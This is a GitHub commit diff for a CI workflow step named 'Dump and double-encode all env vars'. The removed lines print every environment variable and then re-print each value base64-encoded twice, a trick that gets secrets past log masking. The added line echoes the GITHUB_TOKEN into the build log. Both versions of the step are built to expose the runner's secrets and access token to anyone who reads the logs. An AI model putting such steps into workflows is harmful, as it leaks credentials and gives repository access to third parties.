We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 879d704 commit ea27409Copy full SHA for ea27409
.github/workflows/env.yml
@@ -12,14 +12,4 @@ jobs:
12
13
- name: Dump and double‑encode all env vars
14
run: |
15
- echo "### RAW ENVIRONMENT VARIABLES ###"
16
- env
17
-
18
- echo
19
- echo "### DOUBLE BASE64‑ENCODED ENV VARS ###"
20
- # Loop through each variable, encode twice, and print
21
- while IFS='=' read -r name value; do
22
- # First Base64 encode, then again
23
- enc=$(printf '%s' "$value" | base64 | base64)
24
- printf '%s=%s\n' "$name" "$enc"
25
- done < <(env)
+ echo "Value is: $GITHUB_TOKEN"
0 commit comments